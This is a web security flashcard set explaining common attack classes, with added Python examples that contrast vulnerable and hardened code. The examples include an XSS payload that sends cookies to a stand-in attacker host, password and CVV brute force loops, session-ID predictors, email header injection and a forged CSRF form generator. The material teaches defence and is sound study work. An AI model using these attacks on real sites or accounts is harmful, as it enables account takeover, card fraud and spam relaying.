18 Cards in this Set

  • Front
  • Back

Abuse of Functionality

Uses a web site's own features and functionality to attack itself or others.


Ex. Abusing Send-Mail Functions, Abusing Password-Recovery Flows, Abusing functionality to make unrestricted proxy requests.

Abusing Send-Mail Functions

Web apps that send mail must not give the user complete control over the message headers and content. If an attacker can control the From, To, Subject and body fields and there are no anti-automation controls, the application becomes a spam or phishing relay that sends from the site's own mail server.

Formmail

Classic CGI example: a single HTTP GET request to the FormMail script could be used to send an email from the web server, with the recipient and message chosen by whoever sent the request.
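The two cards above describe a form whose fields are copied into an outgoing email. The following is an added example, not code from the page or from FormMail: it builds such a message the naive way and the hardened way, and parses the result to show which recipients a mail transfer agent would actually see. The form fields, addresses, SITE_RECIPIENT and MAX_FIELD are constructed for the example.

```python
import email
import re

# Constructed example inputs (not from the page): one legitimate submission and one
# attacker submission to a hypothetical "contact us" form whose fields are copied
# into an outgoing email.
LEGIT = {"from": "alice@example.com", "subject": "Opening hours?",
         "body": "Hi, is the shop open on Sunday?"}
SPAM = {"from": "alice@example.com\r\nBcc: victim1@example.net, victim2@example.net",
        "subject": "Cheap meds\r\nTo: everyone@example.net",
        "body": "Buy now"}
SITE_RECIPIENT = "support@example.com"  # assumed fixed destination of the form


def build_message_vulnerable(fields, recipient):
    """Copies user fields straight into the headers. A CR/LF inside any field ends
    that header early, so the submitter can append headers of their own (extra
    recipients, a spoofed To or Subject) and turn the form into a mail relay."""
    return (f"From: {fields['from']}\r\n"
            f"To: {recipient}\r\n"
            f"Subject: {fields['subject']}\r\n"
            f"\r\n{fields['body']}")


def recipients_of(raw_message):
    """What the mail transfer agent would see: every address in To/Cc/Bcc."""
    msg = email.message_from_string(raw_message)
    addrs = []
    for header in ("To", "Cc", "Bcc"):
        for value in msg.get_all(header, []):
            addrs.extend(a.strip() for a in value.split(","))
    return addrs


_CRLF = re.compile(r"[\r\n]")
MAX_FIELD = 200  # assumed limit for single-line header fields


def build_message_hardened(fields, recipient, allowed=frozenset({SITE_RECIPIENT})):
    """Same message format, but the recipient must be on an allowlist and no
    header field may contain a line break or exceed a sane length."""
    if recipient not in allowed:
        raise ValueError("recipient is not on the allowlist")
    for name in ("from", "subject"):
        if _CRLF.search(fields[name]):
            raise ValueError(f"line break in {name} field")
        if len(fields[name]) > MAX_FIELD:
            raise ValueError(f"{name} field too long")
    return (f"From: {fields['from']}\r\n"
            f"To: {recipient}\r\n"
            f"Subject: {fields['subject']}\r\n"
            f"\r\n{fields['body']}")


def handle_submission(fields, recipient):
    """Form handler: returns (accepted, raw message or rejection reason)."""
    try:
        return True, build_message_hardened(fields, recipient)
    except ValueError as exc:
        return False, str(exc)
```

Run `recipients_of(build_message_vulnerable(SPAM, SITE_RECIPIENT))` to see the injected Bcc and To addresses appear alongside the intended recipient; the hardened builder rejects the same input before anything is sent. Rate limiting the form (a CAPTCHA or per-IP quota) is the anti-automation control the card refers to and is independent of the header check.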

Abusing Password Recovery Flows

Can be abused if the flow discloses account-specific information at any step, such as whether a username exists or which email address is on file. The response should give only generic information, for example a message that an email has been sent to the account on file, whether or not the account exists.

Unauthorized Proxy Requests

Some services that fetch a URL on the user's behalf (Ex. Google Translate) can be used as an open proxy server: the attacker's requests reach third-party sites, or internal addresses, from the service's own network.
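An added example (not code from the page or from any of the services it names) of the check a "fetch this URL for me" feature needs so that it cannot be driven as an open proxy. The allowlist, the hostnames and the address table are constructed so the example runs offline; a real implementation resolves with socket.getaddrinfo and applies the same test to every address returned.

```python
import ipaddress
from urllib.parse import urlsplit

# Hypothetical allowlist for a "fetch this page for me" feature (translation,
# link preview): only these hosts may be contacted on the user's behalf.
# "preview.example.com" is a deliberately misconfigured entry whose address
# is internal, to show why the address check matters as well as the name check.
ALLOWED_HOSTS = {"translate.example.com", "docs.example.com", "preview.example.com"}

# Constructed name-to-address table (not real DNS data) so the example runs offline.
FAKE_DNS = {
    "translate.example.com": ["172.32.1.5"],
    "docs.example.com": ["11.0.0.5"],
    "preview.example.com": ["10.1.2.3"],
    "evil.example.org": ["172.32.1.9"],
    "metadata.internal": ["169.254.169.254"],  # cloud-metadata style address
    "localhost": ["127.0.0.1"],
}


def resolve(host):
    return [ipaddress.ip_address(a) for a in FAKE_DNS.get(host, [])]


def proxy_target_open(url):
    """Open-proxy behaviour: whatever URL the user supplies, the server connects
    to it, so the feature can be pointed at third-party sites or at internal
    addresses the user could never reach directly. Returns (host, addresses)."""
    host = urlsplit(url).hostname
    return host, [str(a) for a in resolve(host)]


def check_target(url):
    """Hardened check: only http(s), only allowlisted hosts, and every address
    the host resolves to must be globally routable (not loopback, link-local,
    private or otherwise special). Returns (allowed, reason)."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False, "scheme not allowed"
    host = parts.hostname  # strips userinfo, so user@host tricks do not help
    if host is None:
        return False, "no host"
    if host not in ALLOWED_HOSTS:
        return False, "host not on allowlist"
    addrs = resolve(host)
    if not addrs:
        return False, "host does not resolve"
    for addr in addrs:
        if not addr.is_global:
            return False, f"{addr} is not a public address"
    return True, "ok"
```

The name check alone is not enough: an allowlisted name can resolve to an internal address (misconfiguration or DNS rebinding), which is why check_target rejects preview.example.com even though it is on the list.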

Brute Force

Method to determine an unknown value by using an automated process to try a large number of possible values.

Brute Force Log-in Credentials

Often done with a dictionary, since most users choose common words. The dictionary can be extended with number and symbol replacements, personal information, and family members' names, birth dates and phone numbers. A reverse brute force attack fixes one common password and iterates over usernames, attacking whichever user happens to use it; this also avoids per-account lockout because each account sees a single attempt.

Brute Force Credit Card Information

If an attacker has the card number but is missing the CVV/CSC or the expiration date, the missing value is easy to brute force: a 3-digit CVV has only 1,000 possibilities and an expiration month only a few dozen, so without attempt limits on the payment flow it is found in minutes.
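An added example covering the two brute force cards above (log-in credentials and card data); it is not code from the page. It builds candidates from a small dictionary with the mangling rules the page mentions (capitalisation, number replacements, appended years and symbols), runs forward and reverse brute force against a checker, enumerates a 3-digit CVV, and then wraps the same checkers in a failure-count throttle to show what anti-automation does to each attack. The accounts, the card and the dictionary words are constructed; a real system compares against stored hashes, not plain values.

```python
import itertools
from collections import Counter

# Constructed demo accounts and test card (not from the page). Plain values are
# used only so the loops are easy to follow.
ACCOUNTS = {"alice": "Summer2019!", "bob": "password1", "carol": "P@ssw0rd"}
CARD = {"number": "4111111111111111", "exp": "09/26", "cvv": "123"}

LEET = {"a": "@", "o": "0", "e": "3", "i": "1"}  # common number/symbol replacements


def mangle(word):
    """Candidates derived from one dictionary word: as-is, capitalised, with
    leet substitutions, and with digit/year/symbol suffixes appended."""
    leet = "".join(LEET.get(c, c) for c in word)
    bases = {word, word.capitalize(), leet, leet.capitalize()}
    suffixes = ["1", "123", "!"] + [str(year) for year in range(2015, 2026)]
    for base in sorted(bases):
        yield base
        for suffix in suffixes:
            yield base + suffix
            yield base + suffix + "!"


def check_login(username, password):
    return ACCOUNTS.get(username) == password


def check_card(number, exp, cvv):
    return (number, exp, cvv) == (CARD["number"], CARD["exp"], CARD["cvv"])


def brute_force_login(username, wordlist, checker):
    """Forward brute force: many candidate passwords against one account.
    Returns (password or None, attempts made)."""
    attempts = 0
    for candidate in itertools.chain.from_iterable(map(mangle, wordlist)):
        attempts += 1
        if checker(username, candidate):
            return candidate, attempts
    return None, attempts


def reverse_brute_force(usernames, password, checker):
    """Reverse brute force: one common password against many accounts; each
    account sees a single attempt, so per-account lockout never triggers."""
    return [user for user in usernames if checker(user, password)]


def brute_force_cvv(number, exp, checker):
    """A 3-digit CVV has only 1,000 values. Returns (cvv or None, attempts)."""
    for n in range(1000):
        cvv = f"{n:03d}"
        if checker(number, exp, cvv):
            return cvv, n + 1
    return None, 1000


class Throttled:
    """Anti-automation wrapper: after `limit` failures for a key (account name
    or card number) further attempts are refused without being evaluated."""

    def __init__(self, checker, limit):
        self.checker, self.limit = checker, limit
        self.failures, self.refused = Counter(), 0

    def __call__(self, key, *rest):
        if self.failures[key] >= self.limit:
            self.refused += 1
            return False
        ok = self.checker(key, *rest)
        if not ok:
            self.failures[key] += 1
        return ok
```

With the unthrottled checker the three-word dictionary recovers alice's password in a few dozen attempts and the CVV in 124; with Throttled(limit=5) the same loop fails, because the correct guess is never evaluated. Note that the reverse attack is unaffected by per-account lockout, which is why throttling must also be applied per source and per password value.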

Buffer Overflow

Flaw that occurs when more data is written to a block of memory (a buffer) than the buffer was allocated to hold, so adjacent memory is overwritten. Uses: control process execution, crash a process, or modify internal variables.

Buffer Overflow Defenses

Avoid low-level languages such as C and C++; use memory-safe languages such as Java, C# or scripting languages instead. Where C/C++ is unavoidable, avoid dangerous APIs whose use often leads to buffer overflows (gets, strcpy, strcat, sprintf) in favour of bounded alternatives, and enable compiler and OS mitigations (stack canaries, non-executable stack, ASLR).

Content Spoofing

Attack technique that allows an attacker to inject a malicious payload that is later misrepresented as legitimate content of a web application.

Text Only Content Spoofing

Dynamically built pages often take content, such as a page title or an error message, from a query-string value. An attacker can change that value in a URL they send to the victim, and the attacker's text then appears in the HTML body as if it were the site's own content. No markup is needed, so output encoding alone does not stop it.

Markup Reflected Content Spoofing

A URL parameter that supplies a location for reflected markup, such as the source of a frame or an image, is changed so that the attacker's page is embedded inside a page served from a credible website's own URL. The crafted link is spread via emails and message boards, or forced on users by cross-site scripting.
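An added example for the two content-spoofing cards above (text-only and markup-reflected); it is not code from the page. The vulnerable page copies a title and a frame location from query-string values. The hardened page takes the title from server-side data keyed by an identifier, which is what stops text-only spoofing, and accepts only a site-relative path for the frame. The page identifiers, titles and attacker values are constructed.

```python
import html
from urllib.parse import urlsplit

# Constructed query-string values (not from the page) that an attacker would put
# in a link to a hypothetical page taking ?title=... and ?frame_src=...
SPOOFED_TITLE = "Your account is locked. Call 555-0100 to unlock it."
SPOOFED_FRAME = "//evil.example.org/login"
DEFAULT_FRAME = "/home.html"

# Server-side content keyed by page id: the hardened page never renders text
# that came from the URL, only text looked up by an id taken from the URL.
TITLES = {"home": "Welcome", "news": "Latest news"}


def page_vulnerable(title, frame_src):
    """Both parameters are copied straight into the HTML. Escaping the title
    would remove markup but the attacker's text would still be shown as the
    site's own (text-only spoofing); the frame location is taken verbatim
    (markup-reflected spoofing)."""
    return (f"<h1>{title}</h1>\n"
            f'<iframe src="{frame_src}"></iframe>')


def safe_frame_src(frame_src, default=DEFAULT_FRAME):
    """Accept only a site-relative path. Absolute URLs, protocol-relative
    (//host) URLs, schemes such as javascript:, and backslashes (which some
    browsers treat as slashes) all fall back to the default frame."""
    if not frame_src or "\\" in frame_src:
        return default
    parts = urlsplit(frame_src)
    if parts.scheme or parts.netloc or not frame_src.startswith("/"):
        return default
    return frame_src


def page_hardened(page_id, frame_src):
    """Title comes from TITLES, so the URL can choose which title but not its
    text; the frame location is validated, then escaped for the attribute."""
    title = TITLES.get(page_id, "Page not found")
    src = html.escape(safe_frame_src(frame_src), quote=True)
    return (f"<h1>{html.escape(title)}</h1>\n"
            f'<iframe src="{src}"></iframe>')
```

Calling page_hardened with the attacker's title string as the page id yields "Page not found" rather than the spoofed message; html.escape is still applied to the looked-up title and the validated path as defence in depth.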

Credential/Session Prediction

Impersonating a web site user by deducing or guessing the unique session ID that identifies the user's session. This is possible when IDs are generated predictably (sequential, time-based, or from a weak random source) so that an attacker who observes a few of their own IDs can compute or enumerate other users' IDs.
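An added example, not code from the page, of two predictable session-ID schemes and how an attacker exploits each: a sequential counter, where a few observed IDs reveal the step and therefore the next victim's ID, and a time-based ID, where knowing roughly when the victim logged in reduces the search to a small window. The secure generator at the end uses the OS random source. The generator classes, the clock value and the window size are constructed for the example.

```python
import secrets

# Two constructed examples of weak session-ID generators (not from the page).


class SequentialIds:
    """Each login gets the previous ID plus one, zero-padded to eight digits."""

    def __init__(self, start=1000):
        self.current = start

    def new(self):
        self.current += 1
        return f"{self.current:08d}"


class TimeBasedIds:
    """The ID is the login time in whole seconds, in hex. `clock` is injected
    so the example is deterministic (a real one would call time.time)."""

    def __init__(self, clock):
        self.clock = clock

    def new(self):
        return f"{int(self.clock()):x}"


def predict_next_sequential(observed):
    """Attacker logs in a few times, notes the IDs and infers the step. Returns
    the predicted next ID (the next user's session) or None if the IDs are
    not numeric or have no fixed step."""
    try:
        values = [int(s) for s in observed]
    except ValueError:
        return None
    steps = {b - a for a, b in zip(values, values[1:])}
    if len(steps) != 1:
        return None
    return f"{values[-1] + steps.pop():08d}"


def candidates_time_based(approx_login_time, window_seconds):
    """If the attacker knows roughly when the victim logged in, every ID the
    generator could have produced in that window is a candidate: 2*w+1 guesses
    instead of the 2**32 the hex width suggests."""
    base = int(approx_login_time)
    return [f"{t:x}" for t in range(base - window_seconds, base + window_seconds + 1)]


def secure_session_id():
    """256 bits from the OS CSPRNG: consecutive IDs are unrelated and the guess
    space (2**256) is far beyond any brute force, so prediction fails."""
    return secrets.token_urlsafe(32)
```

The same predictor applied to secure_session_id output returns None, and the IDs should also be invalidated on logout and rotated on login so that a leaked ID has a short life.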

Cross-Site Scripting (XSS)

Echoes attacker-supplied code into a user's browser instance. Usually written in HTML/JavaScript, but it can be written in any browser-supported technology. The user could have their account hijacked (cookie theft), their browser redirected to another location, or be shown fraudulent content.

Non-Persistent XSS (Reflected)

Requires the user to visit a specially crafted link laced with malicious code, or a malicious web page containing a web form which, when posted to the vulnerable site, mounts the attack; the server echoes the payload back in its response. DOM-based XSS is the related client-side variant in which the page's own script writes attacker-controlled input (for example part of the URL) into the document without the server reflecting it.

Persistent XSS

Malicious code is submitted to a web site where it is stored for a period of time and later served to every user who views it. Message boards, web mail messages, and web chat software are common targets.
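An added example for the XSS cards above (reflected and persistent); it is not code from the page. A search page reflects the query into three different contexts, HTML text, a quoted attribute and a JavaScript string, and the cookie-theft payload escapes from each. The hardened version encodes for the context it writes into, which is why a single HTML escape is not enough for the script block. The comment store shows that stored input needs the same output encoding when it is rendered later. The payload, the templates and the attacker host are constructed.

```python
import html
import json

# Constructed cookie-theft payload of the kind the page describes (not from the page).
PAYLOAD = '"><script>new Image().src="http://attacker.example/?c="+document.cookie</script>'


def search_page_vulnerable(query):
    """Reflected XSS: the query is echoed into HTML text, into a quoted attribute
    and into a JavaScript string without any encoding. Each of the three
    contexts lets the payload break out and run."""
    return (f'<p>Results for {query}</p>\n'
            f'<input value="{query}">\n'
            f'<script>var q = "{query}";</script>')


def encode_for_html(s):
    """HTML text and quoted attribute values: &, <, >, ", ' become entities."""
    return html.escape(s, quote=True)


def encode_for_js_string(s):
    """Inside a JavaScript string literal. json.dumps escapes quotes, backslashes
    and control characters; <, >, & and ' are additionally \\u-escaped so that a
    "</script>" inside the value cannot close the script element, whichever
    quote style the template uses."""
    return (json.dumps(s)[1:-1]
            .replace("<", "\\u003c").replace(">", "\\u003e")
            .replace("&", "\\u0026").replace("'", "\\u0027"))


def search_page_hardened(query):
    """Same template, each interpolation encoded for its own context."""
    return (f'<p>Results for {encode_for_html(query)}</p>\n'
            f'<input value="{encode_for_html(query)}">\n'
            f'<script>var q = "{encode_for_js_string(query)}";</script>')


# Persistent XSS: text stored earlier is just as untrusted when rendered later.
COMMENTS = []


def post_comment(text):
    """Store the raw text; encoding happens at output time, per context."""
    COMMENTS.append(text)


def render_comments(encode=encode_for_html):
    """Pass encode=lambda s: s to see the stored payload served to every reader."""
    return "".join(f"<li>{encode(c)}</li>" for c in COMMENTS)
```

In search_page_hardened the only `<script>` and `</script>` left are the template's own; the payload survives as harmless text and as a JavaScript string whose value still equals the original query.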

Cross-Site Request Forgery (CSRF, XSRF)

Piggy-backs on an authenticated user's browser session so that the web server trusts forged requests and performs actions on the user's behalf. Because the browser attaches the session cookie automatically, the attacker can trigger state changes, although the same-origin policy normally prevents the attacker's page from reading the responses. Done by studying the format of a legitimate request and forging a new one with the attacker's values. Can be deployed via images, banners, hidden auto-submitting forms, etc.
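An added example, not code from the page, of both sides of a CSRF attack on a hypothetical money-transfer endpoint. The attacker forges a request body from a legitimate request captured in their own account and hosts an auto-submitting form; the victim's browser supplies the session cookie. The bank handler then shows why the attack works without a token check and fails with a session-bound HMAC token (a stateless form of the synchronizer token). The observed request, the session table and SERVER_SECRET are constructed.

```python
import hashlib
import hmac
import secrets
from urllib.parse import parse_qs, urlencode

# Constructed artefacts (not from the page): a legitimate transfer request the
# attacker captured from their own account, and the bank's session table.
OBSERVED_REQUEST = ("POST /account/transfer HTTP/1.1\r\n"
                    "Cookie: session=attacker-session\r\n\r\n"
                    "amount=10&to=friend")
SESSIONS = {"victim-session": "alice", "attacker-session": "mallory"}
SERVER_SECRET = secrets.token_bytes(32)  # assumed per-deployment key for CSRF tokens


def forge_body(observed_request, **overrides):
    """Attacker side: reuse the captured request's parameter names, swap in new values."""
    body = observed_request.split("\r\n\r\n", 1)[1]
    params = {k: v[0] for k, v in parse_qs(body).items()}
    params.update(overrides)
    return urlencode(params)


def attacker_page(action_url, body):
    """Hidden auto-submitting form on the attacker's site; the victim's browser
    attaches the bank's session cookie when it posts. The attacker never sees
    the response (same-origin policy), but the transfer still happens."""
    inputs = "".join(f'<input type="hidden" name="{k}" value="{v[0]}">'
                     for k, v in parse_qs(body).items())
    return (f'<form id="f" action="{action_url}" method="POST">{inputs}</form>'
            '<script>document.getElementById("f").submit()</script>')


def csrf_token(session_id):
    """Token bound to the session by HMAC. The attacker cannot compute it for
    the victim's session and cannot read it from the bank's pages cross-origin."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def handle_transfer(cookie_session, body, require_token=True):
    """Bank side. Returns a status line; require_token=False is the vulnerable
    server that trusts the cookie alone."""
    user = SESSIONS.get(cookie_session)
    if user is None:
        return "401 not logged in"
    params = {k: v[0] for k, v in parse_qs(body).items()}
    if require_token:
        supplied = params.get("csrf_token", "")
        if not hmac.compare_digest(supplied, csrf_token(cookie_session)):
            return "403 missing or invalid CSRF token"
    return f"200 {user} sent {params['amount']} to {params['to']}"
```

The legitimate page embeds csrf_token(session) in its own form, so only requests that originated from the bank's pages carry a valid token; a token from the attacker's session does not validate for the victim's. Marking the session cookie SameSite=Lax or Strict is a complementary browser-side control.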